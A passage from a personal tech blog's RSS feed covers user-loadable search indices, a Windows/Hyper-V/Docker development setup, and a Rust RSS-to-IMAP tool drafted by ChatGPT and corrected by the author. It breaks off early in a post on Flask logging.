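    return json.dumps({"format": FORMAT, "name": name, "postings": index}, sort_keys=True)


def import_index(data):
    doc = json.loads(data)
    if doc.get("format") != FORMAT:
        raise ValueError("unsupported index format")
    return doc["name"], doc["postings"]
```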
<p>The possibilities are endless, but let's take a look at some ideas for inspiration:</p>
<ul>
<li>thematic indices, like an index for programmers with documentation, Stack Overflow, and more</li>
<li>big sites could publish their own index of their content (no crawling needed, but in return, you have to trust them that the index matches the actual content of the site)</li>
<li>location-based indices, for when you need to find all the ice cream shops in Prague</li>
<li>companies that produce paid indices</li>
<li>libraries and public organizations that would make indices of content in their own language</li>
<li>indices of non-profit organizations, such as archive.org, which already has such data anyway</li>
<li>frequently updated news-like indices</li>
<li>infrequently updated encyclopedia-like indices</li>
<li>the index of your neighbor Joe, which is created from his favorite websites</li>
</ul>
<p>Users could load the indices of their choice into their personal search engine, deleting parts that are not relevant to them to save space or get better results. During the search, they could choose which indices to search in.</p>
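<p>A sketch of the user side, assuming each loaded index is a hypothetical <code>{word: [url, ...]}</code> mapping: pruning drops words we don't care about, and a search only looks at the indices we picked. Ranking URLs by how many of the chosen indices agree on them is just one simple option I chose for the example.</p>

```python
def prune(index, keep_words):
    """Drop every term the user doesn't care about, to save space."""
    return {word: urls for word, urls in index.items() if word in keep_words}


def search(indices, chosen, query):
    """Search the query words (all must match) in the chosen indices only.

    indices: {index_name: {word: [url, ...]}}, e.g. loaded from several providers.
    Returns URLs ranked by how many chosen indices matched them, then alphabetically.
    """
    scores = {}
    for name in chosen:
        index = indices[name]
        hits = None
        for word in query.lower().split():
            urls = set(index.get(word, []))
            hits = urls if hits is None else hits.intersection(urls)
        for url in hits or ():
            scores[url] = scores.get(url, 0) + 1
    return sorted(scores, key=lambda url: (-scores[url], url))
```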
<p>From here on, the choice of index providers would determine the quality of the results. I suppose that over time, the good providers would rise to the top, and know-how about customizing indices would build up. Whenever an index deteriorates in quality or isn't fresh enough, you could simply look for a new provider. And the more tech-savvy would still have the option to start their own crawler and build their own index (which they could then sell to others).</p>
<p>Not much has been said about the search interface itself, but that part seems pretty straightforward. Since the index/database has an open format, anyone could build software on it. There would probably be some great open-source alternatives, either as a desktop application or as a web application that could be self-hosted on a server. And there would be plug-ins for these applications that could add calculators, currency converters, search history, and who knows what else to the basic functionality.</p>
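<p>A plug-in could be as simple as a function that gets the query and may return an instant answer before the index is searched. A sketch of that idea with a calculator plug-in; the registry, the decorator and the function names are all hypothetical, and the calculator only handles <code>+ - * /</code> on numbers (parsed with <code>ast</code> rather than <code>eval</code>, so arbitrary code can't run).</p>

```python
import ast
import operator

PLUGINS = []


def plugin(func):
    """Register a function that may answer a query before the index is searched."""
    PLUGINS.append(func)
    return func


OPERATORS = {ast.Add: operator.add, ast.Sub: operator.sub,
             ast.Mult: operator.mul, ast.Div: operator.truediv}


def _evaluate(node):
    if isinstance(node, ast.Constant) and isinstance(node.value, (int, float)):
        return node.value
    if isinstance(node, ast.BinOp) and type(node.op) in OPERATORS:
        return OPERATORS[type(node.op)](_evaluate(node.left), _evaluate(node.right))
    raise ValueError("not a simple arithmetic expression")


@plugin
def calculator(query):
    """Answer queries like '12 * (3 + 4)' without touching the index."""
    try:
        return str(_evaluate(ast.parse(query, mode="eval").body))
    except (SyntaxError, ValueError, ZeroDivisionError):
        return None


def instant_answers(query):
    """Collect the answers of every plug-in that had something to say."""
    return [answer for p in PLUGINS if (answer := p(query)) is not None]
```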
<h3>Summary</h3>
<p>I have a few more little ideas here and there, but I didn't want to ramble too much. Let's get back to the original question. Is it just a dream to have your own search engine? If you want to search the whole Internet: yes. But you don't necessarily need the whole Internet to be happy (or to have a search engine that works well). With the right index providers and index sizes that are acceptable to the end user, I think it could work.</p>

]]></content:encoded>
        </item>
            <item>
            <title>Beyond the Windows</title>
            <link>https://deadlime.hu/en/2023/06/24/beyond-the-windows/</link>
            <pubDate>Sat, 24 Jun 2023 14:04:18 +0000</pubDate>
            
            <dc:creator><![CDATA[Nagy Krisztián]]></dc:creator>
                    <category><![CDATA[Docker]]></category>
                    <category><![CDATA[Samba]]></category>
                    <category><![CDATA[GnuPG]]></category>
                    <category><![CDATA[Hyper-V]]></category>
                    <category><![CDATA[Windows]]></category>
                    <category><![CDATA[development]]></category>
                    
            <guid isPermaLink="false">1a2cc222b96372f72fb72d6e8f7a0796</guid>
            <description>A guided tour of my development environment</description>
            <content:encoded><![CDATA[<p class="image image-center">
    <img src="https://deadlime.hu/uploads/2023/developers.jpg" width="660" height="450" alt="" title="" loading="lazy" />
</p>
<p class="image-caption">Web developers at work; late work of Leonardo da Vinci</p>

<p>Sometimes I feel like an endangered species among all the half-eaten apples, so I'll tell you a little bit about what my development environment looks like as a (web) developer on Windows.</p>
<blockquote>
<p><em>As the rays of the Sun slowly penetrate the three layers of tempered glass, one of the most extraordinary creatures in the northern hemisphere can be seen - Scriptor fenestralis, better known as the web developer on Windows.</em><br />
<br />
<em>Their natural habitat is an ideal combination of artificial lighting and cool temperatures, creating an optimal environment for mentally challenging work.</em></p>
</blockquote>
<p>In short: it's a Windows host machine running a Debian-based virtual machine with Hyper-V. Within that, I use Docker to run specific projects. It's not fancy technology by any stretch of the imagination, but I haven't had the urge to experiment with WSL2 more seriously. But let's get into the details.</p>
<h3>The physical machine</h3>
<p>I used to use VirtualBox, but then I switched to Hyper-V because it's already included in Windows; you just have to turn it on. I also figured that an official virtualization platform might work better. I don't have much to back this up: the one advantage I can think of is that the virtual machine starts automatically with the host, but you could probably do that with VirtualBox as well.</p>
<h4>Networking</h4>
<p>If you want to access your virtual machine (or the Internet from your virtual machine), you need to set up a network for it. There are two ways to go here: an <code>External switch</code> or an <code>Internal switch</code> (there is also a <code>Private switch</code>, but that doesn't help us now).</p>
<p>On my desktop machine, I went with the <code>External switch</code> option, connected it to the network card the machine uses for Internet access, and that's pretty much it. The virtual machine shows up on the router as if it were just another physical machine on the network. Based on its MAC address, I gave it a fixed IP address on the DHCP server and a DNS entry that resolves to that address (<code>devbox.lan</code>).</p>
<p>This may be an acceptable solution for a desktop machine that is rarely moved, but what about a laptop, for example, where you may not have access to every router to configure this? An <code>Internal switch</code> could work in this case. I configured it with the following PowerShell commands:</p>
<pre><code class="hljs powershell">&gt; <span class="hljs-built_in">New-VMSwitch</span> <span class="hljs-literal">-SwitchName</span> <span class="hljs-string">"Internal"</span> <span class="hljs-literal">-SwitchType</span> Internal
&gt; <span class="hljs-built_in">New-NetIPAddress</span> <span class="hljs-literal">-IPAddress</span> <span class="hljs-number">192.168</span>.<span class="hljs-number">56.1</span> <span class="hljs-literal">-PrefixLength</span> <span class="hljs-number">24</span> <span class="hljs-literal">-DefaultGateway</span> <span class="hljs-number">192.168</span>.<span class="hljs-number">56.1</span> <span class="hljs-literal">-InterfaceAlias</span> <span class="hljs-string">"vEthernet (Internal)"</span>
&gt; <span class="hljs-built_in">New-NetNAT</span> <span class="hljs-literal">-Name</span> <span class="hljs-string">"InternalNatNetwork"</span> <span class="hljs-literal">-InternalIPInterfaceAddressPrefix</span> <span class="hljs-number">192.168</span>.<span class="hljs-number">56.0</span>/<span class="hljs-number">24</span>
</code></pre>
<p>We are using the <code>192.168.56.0/24</code> subnet, but without DHCP we don't get an IP address automatically. We have to specify a fixed IP address inside the virtual machine. For Debian, something like this in <code>/etc/network/interfaces</code> should work:</p>
<pre><code>iface eth0 inet static
  address 192.168.56.101
  netmask 255.255.255.0
  gateway 192.168.56.1
</code></pre>
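<p>If you pick different numbers, the guest address, netmask, and gateway all have to fit the prefix given to <code>New-NetNAT</code>. A small sanity check with Python's <code>ipaddress</code> module, assuming the values used above:</p>

```python
import ipaddress

# Values from the New-NetNAT command and /etc/network/interfaces above
nat_prefix = ipaddress.ip_network("192.168.56.0/24")
guest = ipaddress.ip_interface("192.168.56.101/255.255.255.0")  # address + netmask
gateway = ipaddress.ip_address("192.168.56.1")                  # the host's vEthernet (Internal) address

assert guest.network == nat_prefix, "guest address/netmask doesn't match the NAT prefix"
assert gateway in nat_prefix and gateway != guest.ip, "gateway must be another address in the prefix"
print(f"{guest.ip} via {gateway} in {nat_prefix} ({nat_prefix.num_addresses - 2} usable addresses)")
```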
<p>If you also want a hostname for it, you can add the following line to the <code>C:\Windows\System32\drivers\etc\hosts</code> file:</p>
<pre><code>192.168.56.101 devbox.lan
</code></pre>
<p>Sometimes I need to reach a port of the virtual machine on <code>localhost</code> (so that if something inside the virtual machine is listening on port 8080, I can access it at <code>localhost:8080</code>). For this, I initially used the following PowerShell command:</p>
<pre><code class="hljs powershell">&gt; <span class="hljs-built_in">Add-NetNatStaticMapping</span> <span class="hljs-literal">-NatName</span> <span class="hljs-string">"InternalNatNetwork"</span> <span class="hljs-literal">-Protocol</span> TCP <span class="hljs-literal">-ExternalIPAddress</span> <span class="hljs-number">0.0</span>.<span class="hljs-number">0.0</span> <span class="hljs-literal">-InternalIPAddress</span> <span class="hljs-number">192.168</span>.<span class="hljs-number">56.101</span> <span class="hljs-literal">-InternalPort</span> <span class="hljs-number">8080</span> <span class="hljs-literal">-ExternalPort</span> <span class="hljs-number">8080</span>
</code></pre>
<p>After a while, this stopped working. I don't know what happened to it, but after some digging, I found another command:</p>
<pre><code class="hljs powershell">&gt; netsh interface portproxy add v4tov4 listenport=<span class="hljs-number">8080</span> listenaddress=<span class="hljs-number">0.0</span>.<span class="hljs-number">0.0</span> connectport=<span class="hljs-number">8080</span> connectaddress=<span class="hljs-number">192.168</span>.<span class="hljs-number">56.101</span>
</code></pre>
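<p>What <code>netsh interface portproxy</code> sets up is basically a plain TCP relay: accept a connection, open another one to the target, and copy bytes in both directions. A minimal <code>asyncio</code> sketch of the same idea, only to illustrate what happens under the hood (the function names are mine, and it has no error handling or logging):</p>

```python
import asyncio


async def pipe(reader, writer):
    """Copy bytes in one direction until the sender closes its side."""
    try:
        while data := await reader.read(65536):
            writer.write(data)
            await writer.drain()
    finally:
        writer.close()


async def start_port_proxy(listen_host, listen_port, connect_host, connect_port):
    """Accept connections on listen_host:listen_port and relay them to connect_host:connect_port."""
    async def handle(client_reader, client_writer):
        upstream_reader, upstream_writer = await asyncio.open_connection(connect_host, connect_port)
        await asyncio.gather(pipe(client_reader, upstream_writer),
                             pipe(upstream_reader, client_writer))

    return await asyncio.start_server(handle, listen_host, listen_port)


# Roughly the equivalent of:
#   netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0
#                                        connectport=8080 connectaddress=192.168.56.101
# server = await start_port_proxy("0.0.0.0", 8080, "192.168.56.101", 8080)
```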
<p>In hindsight, it might have been easier to just use SSH port forwarding. What a delightful discovery to make while writing this post.</p>
<h4>GUI applications</h4>
<p>The physical machine runs <a href="https://sourceforge.net/projects/vcxsrv/">VcXsrv</a>, an X server for Windows. From the Linux virtual machine, I can use it to launch GUI applications that then appear as regular windows on the Windows desktop. This is usually how I run whichever IDE I'm currently using: it stays inside the virtual machine, because that makes it easier to access the Linux/Docker stuff there, and there are fewer problems around file permissions.</p>
<h4>SSH</h4>
<p>I use a GPG key stored on a <a href="https://www.yubico.com/products/yubikey-5-overview/">YubiKey</a> for SSH authentication. The GPG agent in <a href="https://www.gpg4win.org/">Gpg4win</a> is configured both to handle the YubiKey and to serve the key to SSH clients (PuTTY included):</p>
<pre class="file"><code>scdaemon.conf
</code></pre>
<pre><code>reader-port Yubico Yubi
pcsc-shared
disable-application piv
</code></pre>
<pre class="file"><code>gpg-agent.conf
</code></pre>
<pre><code>enable-ssh-support
enable-putty-support
</code></pre>
<p><a id="cite_ref-1"></a>I use PuTTY as the SSH client (Windows Terminal looks quite promising, but last time I checked, it didn't want to work with the GPG agent). Agent forwarding<a href="#cite_note-1" class="note"><sup>[1]</sup></a> is enabled so that the virtual machine can also use the key on the YubiKey.</p>
<p>Also, my Linux home directory is mounted as a network drive (<code>P:\</code>) to make it easier to move files between the two machines.</p>
<h3>The virtual machine</h3>
<p>This part is pretty basic: a simple Debian or Ubuntu server that I set up using Ansible. After SSHing in, I'm greeted by Bash with the default settings (apart from a few aliases), and I usually start <a href="https://github.com/tmux/tmux#readme">Tmux</a> alongside it. If I'm in the mood, I use <a href="https://github.com/powerline/powerline">Powerline</a> (and its associated <a href="https://github.com/powerline/fonts/tree/master/DejaVuSansMono">DejaVu Sans Mono</a> font) to make them look a bit fancier.</p>
<h4>Samba</h4>
<p>Samba runs on the machine to serve the network drive. I use it with some <a href="https://www.google.com/search?hl=en&amp;q=samba%20performance%20tuning">performance-boosting settings I found on the net</a>:</p>
<pre class="file"><code>/etc/samba/smb.conf
</code></pre>
<pre><code>read raw = yes
write raw = yes
socket options = TCP_NODELAY IPTOS_LOWDELAY SO_RCVBUF=131072 SO_SNDBUF=131072 SO_KEEPALIVE
use sendfile = yes
aio read size = 16384
aio write size = 16384
oplocks = yes
max xmit = 65535
dead time = 15
getwd cache = yes
</code></pre>
<h4>Docker</h4>
<p>Last but not least, Docker is installed for the projects, and hopefully everything else runs inside containers. Speaking of Docker, we should talk a bit about its network setup.</p>
<p>If you let it run wild, there's a small chance that sooner or later it will create a network that conflicts with one of your other local networks and things will start to get weird. To prevent this, it's worth adding something like this to your settings:</p>
<pre class="file"><code>/etc/docker/daemon.json
</code></pre>
<pre><code class="hljs json">{
  <span class="hljs-attr">"bip"</span>: <span class="hljs-string">"172.20.0.1/16"</span>,
  <span class="hljs-attr">"default-address-pools"</span>: [
    {<span class="hljs-attr">"base"</span>: <span class="hljs-string">"172.21.0.0/16"</span>, <span class="hljs-attr">"size"</span>: <span class="hljs-number">24</span>}
  ]
}
</code></pre>
<p>This gives you ~250 networks with ~250 machines per network, which is probably more than enough for a development machine, but if you ever run out, you can add more address ranges to the <code>default-address-pools</code> section.</p>
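<p>The "~250 networks with ~250 machines" figure can be checked with Python's <code>ipaddress</code> module. This sketch uses the values from the <code>daemon.json</code> above and, as an assumed example of "your other local networks", the Hyper-V NAT subnet from earlier:</p>

```python
import ipaddress

# Values from /etc/docker/daemon.json above
bridge = ipaddress.ip_interface("172.20.0.1/16")  # "bip": address and subnet of docker0
pool = ipaddress.ip_network("172.21.0.0/16")      # "base" of the default address pool
subnets = list(pool.subnets(new_prefix=24))       # "size": 24

# Networks already in use locally (assumption: the Hyper-V NAT subnet, plus docker0 itself)
local_networks = [ipaddress.ip_network("192.168.56.0/24"), bridge.network]

conflicts = [s for s in subnets if any(s.overlaps(n) for n in local_networks)]

print(len(subnets), "networks:", subnets[0], "...", subnets[-1])
print(subnets[0].num_addresses - 2, "host addresses per network (one is used as the gateway)")
print("conflicts:", conflicts or "none")
```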
<p>That brings us to the end of the tour; I hope you enjoyed the trip. We've only scratched the surface of quite a lot of things, but this is probably enough to get you started on this bumpy road.<br />
Having said that, I might as well admit now that I'm not sure I could recommend this setup to anyone. I'm comfortable enough with it not to change anything for the time being, but I'm still looking for alternatives.</p>
<hr />
<h3>Notes</h3>
<p><a id="cite_note-1"></a>1. <a href="#cite_ref-1" class="note">↑</a> It is often said that agent forwarding is not a good idea, because the socket will be available to others on the target machine if they have enough privileges (e.g. root), but this is not a threat in our case.</p>

]]></content:encoded>
        </item>
            <item>
            <title>Rolled by the machine</title>
            <link>https://deadlime.hu/en/2023/04/06/rolled-by-the-machine/</link>
            <pubDate>Wed, 05 Apr 2023 22:16:30 +0000</pubDate>
            
            <dc:creator><![CDATA[Nagy Krisztián]]></dc:creator>
                    <category><![CDATA[ChatGPT]]></category>
                    <category><![CDATA[Rust]]></category>
                    <category><![CDATA[email]]></category>
                    <category><![CDATA[Feed]]></category>
                    
            <guid isPermaLink="false">5dbaf67e249bc7e14f4ef8bfc86684fc</guid>
            <description>Let ChatGPT do the programming</description>
            <content:encoded><![CDATA[<p class="image image-center">
    <img src="https://deadlime.hu/uploads/2023/ai.jpg" width="660" height="450" alt="" title="" loading="lazy" />
</p>
<p class="image-caption"><a href="https://www.midjourney.com/">Midjourney</a> generated this image for us</p>

<p>I've been toying with an idea about alternative uses of the mailbox for a while now. The gist of it is that you can create arbitrary email-like things in your account via the IMAP protocol, without actually sending any emails.</p>
<p>For example, we could click on a &quot;Save for later&quot; button on a page, and an unread email with the page's content would appear in our mailbox. Or we could subscribe to the RSS feed of a site, and new articles would arrive as emails. So the mailbox could serve as a kind of database, for which there are already clients on every platform imaginable.</p>
<h3>A little bit of extra intelligence</h3>
<p>Time went by and the project went nowhere, until one day I was chatting with ChatGPT (model GPT-4, but I just called him Dave) about fun weekend projects he could come up with. The responses weren't very inspiring, but they reminded me that I already had a weekend project I should dust off.</p>
<p>So I asked him how to process RSS feeds in Python, then how to create email messages and save them via the IMAP protocol. The answers were quite convincing at first glance, so I had him write the whole project: create an email message from each entry of an RSS feed, then save it to a mailbox via IMAP, all written in Python, of course.</p>
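<p>The Python version ChatGPT wrote isn't shown here, so this is my own minimal sketch of the first two steps using only the standard library: <code>xml.etree.ElementTree</code> to read the feed and <code>email.message.EmailMessage</code> to build a message per entry. It assumes a plain RSS 2.0 feed with <code>title</code>, <code>link</code> and <code>description</code> elements; Atom feeds, namespaces, or HTML inside descriptions would need more care. The function names are hypothetical.</p>

```python
import xml.etree.ElementTree as ET
from email.message import EmailMessage


def parse_rss_items(xml_text):
    """Return (title, link, description) for every item of an RSS 2.0 feed."""
    root = ET.fromstring(xml_text)
    return [
        (item.findtext("title", ""), item.findtext("link", ""), item.findtext("description", ""))
        for item in root.iterfind("./channel/item")
    ]


def create_email_from_entry(title, link, description, sender, recipient):
    """Build a plain-text message from one feed entry; nothing is sent anywhere."""
    msg = EmailMessage()
    msg["From"] = sender
    msg["To"] = recipient
    msg["Subject"] = title
    msg.set_content(f"{description}\n\nRead more at: {link}")  # text/plain body
    return msg
```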
<p>At this point, I had a minor existential crisis. No need to keep me around, just ask ChatGPT. I'm sure it would take him much less time to write this article, and here I am, spending hours on it.</p>
<p>But gloom aside, I eventually asked him to rewrite the whole thing in Rust, which I would then try to run. Rust is trendy anyway, and I don't really know it, so it would be more exciting.</p>
<h3>Ready to start</h3>
<p>First, I got a list of the dependencies I need to add to my <code>Cargo.toml</code> file:</p>
<pre><code class="hljs ini"><span class="hljs-section">[dependencies]</span>
<span class="hljs-attr">rss</span> = <span class="hljs-string">"1.10.0"</span>
<span class="hljs-attr">lettre</span> = <span class="hljs-string">"0.10.0-rc.3"</span>
<span class="hljs-attr">imap</span> = <span class="hljs-string">"3.0.0"</span>
<span class="hljs-attr">native-tls</span> = <span class="hljs-string">"0.2.8"</span>
<span class="hljs-attr">tokio</span> = { version = <span class="hljs-string">"1.0"</span>, features = [<span class="hljs-string">"full"</span>] }
</code></pre>
<p>Looks good, but <code>imap</code> has no <code>3.0.0</code> release (yet), so I changed it to <code>3.0.0-alpha.10</code>, the most recent version. If it were up to me, I'd rather use the latest stable version of everything, but I'm not paid to think (heck, I'm not even paid).</p>
<p>The first code snippet I got was the downloading and processing of the RSS feed:</p>
<pre><code class="hljs rust"><span class="hljs-keyword">use</span> rss::Channel;

<span class="hljs-keyword">async</span> <span class="hljs-function"><span class="hljs-keyword">fn</span> <span class="hljs-title">parse_rss_feed</span></span>(url: &amp;<span class="hljs-built_in">str</span>) -&gt; <span class="hljs-built_in">Result</span>&lt;Channel, <span class="hljs-built_in">Box</span>&lt;<span class="hljs-keyword">dyn</span> std::error::Error&gt;&gt; {
    <span class="hljs-keyword">let</span> content = reqwest::get(url).<span class="hljs-keyword">await</span>?.bytes().<span class="hljs-keyword">await</span>?;
    <span class="hljs-keyword">let</span> channel = Channel::read_from(&amp;content[..])?;
    <span class="hljs-literal">Ok</span>(channel)
}
</code></pre>
<p>The compiler complained that it didn't know anything about the <code>reqwest</code> crate, so I had to add a <code>reqwest = &quot;0.11.16&quot;</code> line to the <code>Cargo.toml</code> file.</p>
<p>The next piece of code I got created an email message from an RSS entry:</p>
<pre><code class="hljs rust"><span class="hljs-keyword">use</span> lettre::message::{Header, Message, Mailbox};

<span class="hljs-function"><span class="hljs-keyword">fn</span> <span class="hljs-title">create_email_from_entry</span></span>(entry: &amp;rss::Item, sender: &amp;<span class="hljs-built_in">str</span>, recipient: &amp;<span class="hljs-built_in">str</span>) -&gt; Message {
    <span class="hljs-keyword">let</span> body = <span class="hljs-built_in">format!</span>(<span class="hljs-string">"{}\n\nRead more at: {}"</span>, entry.description().unwrap_or_default(), entry.link().unwrap_or_default());
    Message::builder()
        .from(sender.parse().unwrap())
        .to(recipient.parse().unwrap())
        .subject(entry.title().unwrap_or_default())
        .header(Header::new(<span class="hljs-string">"Content-Type"</span>, <span class="hljs-string">"text/plain; charset=utf-8"</span>))
        .body(body)
        .unwrap()
}
</code></pre>
<p>The compiler did not like the use of <code>Header</code> because it's private. And the <code>Mailbox</code> isn't even used. Fortunately, there is built-in support for the <code>text/plain</code> content type in the library, so this is what I came up with:</p>
<pre><code class="hljs rust"><span class="hljs-keyword">use</span> lettre::message::{header::ContentType, Message};

<span class="hljs-ignore">fn create_email_from_entry(entry: &amp;rss::Item, sender: &amp;str, recipient: &amp;str) -&gt; Message {</span>
<span class="hljs-ignore">    let body = format!("{}\n\nRead more at: {}", entry.description().unwrap_or_default(), entry.link().unwrap_or_default());</span>
<span class="hljs-ignore">    Message::builder()</span>
<span class="hljs-ignore">        .from(sender.parse().unwrap())</span>
<span class="hljs-ignore">        .to(recipient.parse().unwrap())</span>
<span class="hljs-ignore">        .subject(entry.title().unwrap_or_default())</span>
        .header(ContentType::TEXT_PLAIN)
<span class="hljs-ignore">        .body(body)</span>
<span class="hljs-ignore">        .unwrap()</span>
}
</code></pre>
<p>The next step was saving the email messages via the IMAP protocol:</p>
<pre><code class="hljs rust"><span class="hljs-keyword">use</span> imap::Client;
<span class="hljs-keyword">use</span> native_tls::TlsConnector;

<span class="hljs-keyword">async</span> <span class="hljs-function"><span class="hljs-keyword">fn</span> <span class="hljs-title">save_emails_to_mailbox</span></span>(
    imap_server: &amp;<span class="hljs-built_in">str</span>,
    user_email: &amp;<span class="hljs-built_in">str</span>,
    password: &amp;<span class="hljs-built_in">str</span>,
    mailbox: &amp;<span class="hljs-built_in">str</span>,
    messages: <span class="hljs-built_in">Vec</span>&lt;Message&gt;,
) -&gt; <span class="hljs-built_in">Result</span>&lt;(), <span class="hljs-built_in">Box</span>&lt;<span class="hljs-keyword">dyn</span> std::error::Error&gt;&gt; {
    <span class="hljs-keyword">let</span> tls = TlsConnector::builder().build()?;
    <span class="hljs-keyword">let</span> client = Client::secure_connect((imap_server, <span class="hljs-number">993</span>), imap_server, &amp;tls)?;
    <span class="hljs-keyword">let</span> <span class="hljs-keyword">mut</span> imap_session = client.login(user_email, password).map_err(|(e, _)| e)?;

    imap_session.select(mailbox)?;

    <span class="hljs-keyword">for</span> message <span class="hljs-keyword">in</span> messages {
        <span class="hljs-keyword">let</span> message_string = message.formatted();
        imap_session.append(mailbox, message_string.as_bytes())?;
    }

    imap_session.logout()?;
    <span class="hljs-literal">Ok</span>(())
}
</code></pre>
<p>That's a bit problematic. <code>Client::secure_connect</code> doesn't exist, <code>message_string</code> doesn't have an <code>as_bytes</code> method, and for some reason, you can't put <code>?</code> after <code>append(...)</code>. If I knew Rust, I could probably explain why, but given my situation, let's just say that I eventually managed to get it to compile:</p>
<pre><code class="hljs rust"><span class="hljs-keyword">use</span> imap::ClientBuilder;

<span class="hljs-ignore">async fn save_emails_to_mailbox(</span>
<span class="hljs-ignore">    imap_server: &amp;str,</span>
<span class="hljs-ignore">    user_email: &amp;str,</span>
<span class="hljs-ignore">    password: &amp;str,</span>
<span class="hljs-ignore">    mailbox: &amp;str,</span>
<span class="hljs-ignore">    messages: Vec&lt;Message&gt;,</span>
<span class="hljs-ignore">) -&gt; Result&lt;(), Box&lt;dyn std::error::Error&gt;&gt; {</span>
    <span class="hljs-keyword">let</span> client = ClientBuilder::new(imap_server, <span class="hljs-number">993</span>).native_tls()?;
<span class="hljs-ignore">    let mut imap_session = client.login(user_email, password).map_err(|(e, _)| e)?;</span>

<span class="hljs-ignore">    imap_session.select(mailbox)?;</span>

<span class="hljs-ignore">    for message in messages {</span>
<span class="hljs-ignore">        let message_string = message.formatted();</span>
        imap_session.append(mailbox, message_string.as_slice());
<span class="hljs-ignore">    }</span>

<span class="hljs-ignore">    imap_session.logout()?;</span>
<span class="hljs-ignore">    Ok(())</span>
<span class="hljs-ignore">}</span>
</code></pre>
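<p>For comparison, the same step with Python's <code>imaplib</code>, again as my own sketch rather than ChatGPT's code. It expects an already logged-in connection and uses the IMAP <code>APPEND</code> command, which works in the authenticated state, so unlike the Rust code it doesn't need to select the mailbox first.</p>

```python
import imaplib
import time


def save_emails_to_mailbox(imap, mailbox, messages):
    """Store email.message objects in a mailbox with IMAP APPEND; nothing is sent via SMTP.

    imap is an already logged-in imaplib.IMAP4 / IMAP4_SSL connection.
    """
    for msg in messages:
        status, detail = imap.append(
            mailbox,
            None,                                    # no flags, so the message shows up as unread
            imaplib.Time2Internaldate(time.time()),  # INTERNALDATE: now
            msg.as_bytes(),
        )
        if status != "OK":
            raise RuntimeError(f"APPEND failed: {detail!r}")


# Usage, with the same placeholder values as the Rust main():
# with imaplib.IMAP4_SSL("imap.gmail.com", 993) as imap:
#     imap.login("your_email@example.com", "your_password")
#     save_emails_to_mailbox(imap, "INBOX", messages)
```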
<p>And last but not least is the <code>main()</code> function, which wraps it all up:</p>
<pre><code class="hljs rust"><span class="hljs-meta">#[tokio::main]</span>
<span class="hljs-keyword">async</span> <span class="hljs-function"><span class="hljs-keyword">fn</span> <span class="hljs-title">main</span></span>() -&gt; <span class="hljs-built_in">Result</span>&lt;(), <span class="hljs-built_in">Box</span>&lt;<span class="hljs-keyword">dyn</span> std::error::Error&gt;&gt; {
    <span class="hljs-keyword">let</span> rss_url = <span class="hljs-string">"https://example.com/rss_feed.xml"</span>;
    <span class="hljs-keyword">let</span> imap_server = <span class="hljs-string">"imap.gmail.com"</span>;
    <span class="hljs-keyword">let</span> user_email = <span class="hljs-string">"your_email@example.com"</span>;
    <span class="hljs-keyword">let</span> password = <span class="hljs-string">"your_password"</span>;
    <span class="hljs-keyword">let</span> mailbox = <span class="hljs-string">"INBOX"</span>;

    <span class="hljs-keyword">let</span> channel = parse_rss_feed(rss_url).<span class="hljs-keyword">await</span>?;

    <span class="hljs-keyword">let</span> messages: <span class="hljs-built_in">Vec</span>&lt;_&gt; = channel
        .items()
        .iter()
        .map(|entry| create_email_from_entry(entry, user_email, user_email))
        .collect();

    save_emails_to_mailbox(imap_server, user_email, password, mailbox, messages).<span class="hljs-keyword">await</span>?;

    <span class="hljs-literal">Ok</span>(())
}
</code></pre>
<p>The compiler didn't find any errors in this, but a new warning came up about the earlier code: the <code>AppendCmd</code> returned by the <code>append(...)</code> call should be used. This made me suspect that something wasn't quite right, so I fixed it like this:</p>
<pre><code class="hljs rust">imap_session.append(mailbox, message_string.as_slice()).finish()?;
</code></pre>
<p>What a joy, the <code>?</code> at the end of the line is back, and the code compiles without any problems. Finally, I replaced the values of the config variables in <code>main()</code> with the correct ones, ran the resulting program, and... it worked!</p>
<h3>A brave new world</h3>
<p>I would be more than happy to say that it was a shame to leave a human's work to a machine, but on the one hand, it still saved me a lot of time, and on the other hand, ChatGPT would probably have fixed it himself if I had pasted the error messages back to him.</p>
<p>Afterward, we talked a bit more about how he would run the program using systemd, Supervisor, or Docker, how to monitor such a program, and what config file format he would recommend, but if you want to know more about that, you'll have to ask him, he'll be happy to tell you.</p>

]]></content:encoded>
        </item>
            <item>
            <title>A bug&#039;s life</title>
            <link>https://deadlime.hu/en/2023/02/03/a-bugs-life/</link>
            <pubDate>Fri, 03 Feb 2023 10:06:12 +0000</pubDate>
            
            <dc:creator><![CDATA[Nagy Krisztián]]></dc:creator>
                    <category><![CDATA[Python]]></category>
                    <category><![CDATA[Flask]]></category>
                    <category><![CDATA[logging]]></category>
                    
            <guid isPermaLink="false">05ce611190baa7c7a69c6bceec4f3b0e</guid>
            <description>How to log the wrong way in Flask</description>
            <content:encoded><![CDATA[<p class="image image-center">
    <img src="https://deadlime.hu/uploads/2023/flasks.jpg" width="660" height="450" alt="" title="" loading="lazy" />
</p>

<p>Our past decisions can stab us in the back in quite surprising and unexpected ways, and the natural evolution of our code is no exception. Only time can tell whether the choices we make today will turn out to be right or wrong.<br />
Of course, there are &quot;habits&quot;, &quot;methodologies&quot;, &quot;patterns&quot; and other things that can be followed, which will produce good results in most cases, but sometimes we still manage to be creative enough to shoot ourselves in the foot.</p>
<p>Today we'll try to achieve that using Python and <a href="https://flask.palletsprojects.com/">Flask</a> by extending a very complex &quot;Hello World&quot; application.</p>
<h3>A bug's birth</h3>
<p>So the project starts, everyone is excited, we finally have a blank page to fill in, and the development will not be slowed down by the weight of our previous (wrong) decisions. Soon we finish the first version.</p>
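<pre><code class="hljs python"><span class="hljs-keyword">from</span> flask <span class="hljs-keyword">import</span> Flask
<span class="hljs-keyword">from</span> flask.views <span class="hljs-keyword">import</span> MethodView

<span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">HelloView</span><span class="hljs-params">(MethodView)</span>:</span>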
    <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">get</span><span class="hljs-params">(self)</span>:</span>
        <span class="hljs-keyword">return</span> <span class="hljs-string">'Hello World\n'</span>

app = Flask(__name__)
app.add_url_rule(<span class="hljs-string">'/'</span>, view_func=HelloView.as_view(<span class="hljs-string">'hello'</span>))

<span class="hljs-keyword">if</span> __name__ == <span class="hljs-string">'__main__'</span>:
    app.run(port=<span class="hljs-number">8080</span>)
</code></pre>
<p>Soon after, we realise that such a complex application cannot exist without logging, so we add it as an afterthought.</p>
<pre><code class="hljs python"><span class="hljs-ignore">class HelloView(MethodView):</span>
    logger = logging.getLogger(<span class="hljs-string">'view.hello'</span>)

